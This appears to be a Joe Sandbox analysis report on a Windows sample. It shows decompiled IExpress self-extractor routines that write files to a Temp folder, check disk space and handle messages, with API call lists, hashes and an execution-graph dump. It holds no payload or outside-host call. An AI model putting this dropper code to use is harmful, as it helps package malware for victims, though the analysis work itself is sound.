                                                                                                                                                                                                        				E00211781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        				E0021658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0x219124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0x219124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 002163EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-1116576409
                                                                                                                                                                                                        • Opcode ID: 6005aa58203fbe7502712c13be5d52fd876d26ccc8d0af766c4f92a4a4fce984
                                                                                                                                                                                                        • Instruction ID: 8245f6bb0c3751647a037c344806ba6274257c0ee6a9adfab150220fd4084dbb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6005aa58203fbe7502712c13be5d52fd876d26ccc8d0af766c4f92a4a4fce984
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721F371A0021CABD720DF25EC89FEE73BCEB68310F1041A9E584A3280CAB05DD48FA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002147E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00211680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0x2191e0; // 0x30b8f48
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0x2191e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0x218584; // 0x0
                                                                                                                                                                                                        					E002144B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0x218584; // 0x0
                                                                                                                                                                                                        				E002144B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00214E6F), ref: 002147EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00214823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00214847
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00214851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-1116576409
                                                                                                                                                                                                        • Opcode ID: 3506746f13b3b445269da6e02dd2c007498b42a95afac740d319f1d61a0a0f45
                                                                                                                                                                                                        • Instruction ID: 929d3c444c7be5aea42f6bffacd4429cc61302ce982c4e9e6242b9321340681f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3506746f13b3b445269da6e02dd2c007498b42a95afac740d319f1d61a0a0f45
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F31159782106426FD724AF24AC5CFF23B9AEBA5300B05C528FA4ACB341CE358C528620
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0021369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 002136CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 2e86bf8802c8bf4dd9ccd760474cbd3b9f633bbf207e3e5cec755e7e2aeeef7f
                                                                                                                                                                                                        • Instruction ID: 2797ef7585795b93a0fa393e011abb38e5fe047893e2fffbfa42aa3bee42ed4e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e86bf8802c8bf4dd9ccd760474cbd3b9f633bbf207e3e5cec755e7e2aeeef7f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D901A772A11259BBDF308FA66C4CEEB7ABDEBD5B10F10012DFD05E2184D961C694C664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E002165E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00212B33), ref: 00216602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00216612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00216629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00216635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: a05be582624a43a66e6fa1141ed695dab86064d010e2ee122df76db7ec478466
                                                                                                                                                                                                        • Instruction ID: c640e873790f91d51229c407cc704163bcd1f2002564aedbd3c344ce8c9b15c2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a05be582624a43a66e6fa1141ed695dab86064d010e2ee122df76db7ec478466
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0F4324161917EE7331F289C8C8FFBFDCCBB7255B2941AFE49982001DA990D868661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002169B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0x2181f8 = E00216C70();
                                                                                                                                                                                                        				__set_app_type(E00216FBE(2));
                                                                                                                                                                                                        				 *0x2188a4 =  *0x2188a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0x2188a8 =  *0x2188a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0x218528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0x21851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00217000();
                                                                                                                                                                                                        				if( *0x218000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00217000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E002171EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00216FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00216FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 002169C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 002169D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 002169E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00216A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 1d40083a259271c1512c91f0695a0ff2636a176634624294c39b8d3ae686eb0d
                                                                                                                                                                                                        • Instruction ID: ecb1f96af541a23eef9ff852e0639c98b17dfe5c132d0e8dc4bc60af6b3af62a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d40083a259271c1512c91f0695a0ff2636a176634624294c39b8d3ae686eb0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70F0F8741193059FC714AF34BD8E6C83BA2FB78331B118609E862862E1CF3A85A5CE11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216952(CHAR* __ecx) {
                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                        				if( *__ecx != 0) {
                                                                                                                                                                                                        					_t6 =  &_v20; // 0x215760
                                                                                                                                                                                                        					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                        						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W!,?,00000000,00215760,?,A:\), ref: 0021697F
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00216999
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                                                                        • String ID: `W!
                                                                                                                                                                                                        • API String ID: 1705453755-235260415
                                                                                                                                                                                                        • Opcode ID: 81fd7557803e188f9f4f6d69506e0b7f1a3eddb7040f79d15953c5304f3c36e4
                                                                                                                                                                                                        • Instruction ID: 8f0a452c5387dcb466fc2c3b492877205feda84e7f15d55f8a23c5a7df541b32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81fd7557803e188f9f4f6d69506e0b7f1a3eddb7040f79d15953c5304f3c36e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0F9B6D1122CBBCB11DFE8DC48ADEBBFCEB49701F104296E914E3240DA719A508BD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:26.9%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:969
                                                                                                                                                                                                        Total number of Limit Nodes:43
2664 bc25e3 2661->2664 2662->2664 2666 bc259b RegOpenKeyExA 2662->2666 2665 bc25d1 RegCloseKey 2663->2665 2664->2307 2665->2664 2666->2664 2667 bc25bc RegQueryValueExA 2666->2667 2667->2665 2669 bc3bdb 2668->2669 2682 bc3bec 2668->2682 2670 bc468f 7 API calls 2669->2670 2670->2682 2671 bc3c03 memset 2671->2682 2672 bc3d13 2673 bc44b9 20 API calls 2672->2673 2701 bc3d26 2673->2701 2675 bc3f4d 2677 bc6ce0 4 API calls 2675->2677 2676 bc468f 7 API calls 2676->2682 2678 bc3f60 2677->2678 2678->2311 2679 bc3d7b CompareStringA 2679->2682 2689 bc3fd7 2679->2689 2681 bc3fab 2684 bc44b9 20 API calls 2681->2684 2682->2671 2682->2672 2682->2675 2682->2676 2682->2679 2682->2681 2685 bc3f1e LocalFree 2682->2685 2686 bc3f46 LocalFree 2682->2686 2682->2689 2691 bc3cc7 CompareStringA 2682->2691 2702 bc3e10 2682->2702 2914 bc1ae8 2682->2914 2954 bc202a memset memset RegCreateKeyExA 2682->2954 2980 bc3fef 2682->2980 2688 bc3fbe LocalFree 2684->2688 2685->2682 2685->2689 2686->2675 2688->2675 2689->2675 3004 bc2267 2689->3004 2691->2682 2692 bc3e1f GetProcAddress 2694 bc3f64 2692->2694 2692->2702 2693 bc3f92 2695 bc44b9 20 API calls 2693->2695 2697 bc44b9 20 API calls 2694->2697 2696 bc3fa9 2695->2696 2698 bc3f7c LocalFree 2696->2698 2699 bc3f75 FreeLibrary 2697->2699 2700 bc6285 GetLastError 2698->2700 2699->2698 2700->2701 2701->2675 2702->2692 2702->2693 2703 bc3eff FreeLibrary 2702->2703 2704 bc3f40 FreeLibrary 2702->2704 2994 bc6495 2702->2994 2703->2685 2704->2686 2706 bc468f 7 API calls 2705->2706 2707 bc3a55 LocalAlloc 2706->2707 2708 bc3a6c 2707->2708 2709 bc3a8e 2707->2709 2711 bc44b9 20 API calls 2708->2711 2710 bc468f 7 API calls 2709->2710 2712 bc3a98 2710->2712 2713 bc3a7d 2711->2713 2714 bc3a9c 2712->2714 2715 bc3ac5 lstrcmpA 2712->2715 2716 bc6285 GetLastError 2713->2716 2717 bc44b9 20 API calls 2714->2717 2718 bc3b0d LocalFree 2715->2718 2719 bc3ada 2715->2719 2722 bc2f64 2716->2722 2720 bc3aad LocalFree 2717->2720 2718->2722 2721 bc6517 24 API calls 2719->2721 
2720->2722 2723 bc3aec LocalFree 2721->2723 2722->2278 2722->2313 2723->2722 2725 bc303c 2724->2725 2725->2313 2727 bc468f 7 API calls 2726->2727 2728 bc417d LocalAlloc 2727->2728 2729 bc41a8 2728->2729 2730 bc4195 2728->2730 2732 bc468f 7 API calls 2729->2732 2731 bc44b9 20 API calls 2730->2731 2734 bc41a6 2731->2734 2733 bc41b5 2732->2733 2735 bc41b9 2733->2735 2736 bc41c5 lstrcmpA 2733->2736 2734->2313 2738 bc44b9 20 API calls 2735->2738 2736->2735 2737 bc41e6 LocalFree 2736->2737 2737->2734 2738->2737 2740 bc171e _vsnprintf 2739->2740 2741 bc62c9 FindResourceA 2740->2741 2743 bc62cb LoadResource LockResource 2741->2743 2744 bc6353 2741->2744 2743->2744 2747 bc62e0 2743->2747 2745 bc6ce0 4 API calls 2744->2745 2746 bc51ca 2745->2746 2746->2584 2746->2585 2748 bc631b FreeResource 2747->2748 2749 bc6355 FreeResource 2747->2749 2750 bc171e _vsnprintf 2748->2750 2749->2744 2750->2741 2752 bc548a 2751->2752 2771 bc551a 2751->2771 2812 bc53a1 2752->2812 2754 bc5581 2758 bc6ce0 4 API calls 2754->2758 2757 bc5495 2757->2754 2763 bc550c 2757->2763 2764 bc54c2 GetSystemInfo 2757->2764 2765 bc559a 2758->2765 2759 bc554d 2759->2754 2766 bc597d 34 API calls 2759->2766 2760 bc553b CreateDirectoryA 2761 bc5577 2760->2761 2762 bc5547 2760->2762 2767 bc6285 GetLastError 2761->2767 2762->2759 2768 bc658a CharPrevA 2763->2768 2769 bc54da 2764->2769 2765->2605 2775 bc2630 GetWindowsDirectoryA 2765->2775 2772 bc555c 2766->2772 2770 bc557c 2767->2770 2768->2771 2769->2763 2773 bc658a CharPrevA 2769->2773 2770->2754 2823 bc58c8 2771->2823 2772->2754 2774 bc5568 RemoveDirectoryA 2772->2774 2773->2763 2774->2754 2776 bc265e 2775->2776 2777 bc266f 2775->2777 2778 bc44b9 20 API calls 2776->2778 2779 bc6ce0 4 API calls 2777->2779 2778->2777 2780 bc2687 2779->2780 2780->2617 2780->2626 2782 bc696e GetDiskFreeSpaceA 2781->2782 2783 bc69a1 2781->2783 2782->2783 2784 bc6989 MulDiv 2782->2784 2783->2635 2784->2783 2786 bc59dd GetDiskFreeSpaceA 2785->2786 2787 bc59bb 2785->2787 2788 bc5ba1 
memset 2786->2788 2789 bc5a21 MulDiv 2786->2789 2790 bc44b9 20 API calls 2787->2790 2791 bc6285 GetLastError 2788->2791 2789->2788 2792 bc5a50 GetVolumeInformationA 2789->2792 2793 bc59cc 2790->2793 2794 bc5bbc GetLastError FormatMessageA 2791->2794 2795 bc5a6e memset 2792->2795 2796 bc5ab5 SetCurrentDirectoryA 2792->2796 2797 bc6285 GetLastError 2793->2797 2798 bc5be3 2794->2798 2799 bc6285 GetLastError 2795->2799 2806 bc5acc 2796->2806 2809 bc59d1 2797->2809 2801 bc44b9 20 API calls 2798->2801 2802 bc5a89 GetLastError FormatMessageA 2799->2802 2800 bc5b94 2804 bc6ce0 4 API calls 2800->2804 2803 bc5bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2800 2805 bc5c11 2804->2805 2805->2617 2807 bc5b0a 2806->2807 2810 bc5b20 2806->2810 2808 bc44b9 20 API calls 2807->2808 2808->2809 2809->2800 2810->2800 2835 bc268b 2810->2835 2814 bc53bf 2812->2814 2813 bc171e _vsnprintf 2813->2814 2814->2813 2815 bc658a CharPrevA 2814->2815 2819 bc5415 GetTempFileNameA 2814->2819 2816 bc53fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 bc544f CreateDirectoryA 2816->2817 2818 bc543a 2817->2818 2817->2819 2821 bc6ce0 4 API calls 2818->2821 2819->2818 2820 bc5429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 bc5449 2821->2822 2822->2757 2824 bc58d8 2823->2824 2824->2824 2825 bc58df LocalAlloc 2824->2825 2826 bc58f3 2825->2826 2828 bc5919 2825->2828 2827 bc44b9 20 API calls 2826->2827 2829 bc5906 2827->2829 2831 bc658a CharPrevA 2828->2831 2830 bc6285 GetLastError 2829->2830 2832 bc5534 2829->2832 2830->2832 2833 bc5931 CreateFileA LocalFree 2831->2833 2832->2759 2832->2760 2833->2829 2834 bc595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 bc26b9 2835->2836 2837 bc26e5 2835->2837 2838 bc171e _vsnprintf 2836->2838 2839 bc26ea 2837->2839 2843 bc271f 2837->2843 2840 bc26cc 2838->2840 2841 bc171e _vsnprintf 2839->2841 2844 bc44b9 20 API calls 2840->2844 2846 bc26fd 2841->2846 2842 bc26e3 2845 bc6ce0 4 API calls 2842->2845 2843->2842 2847 bc171e 
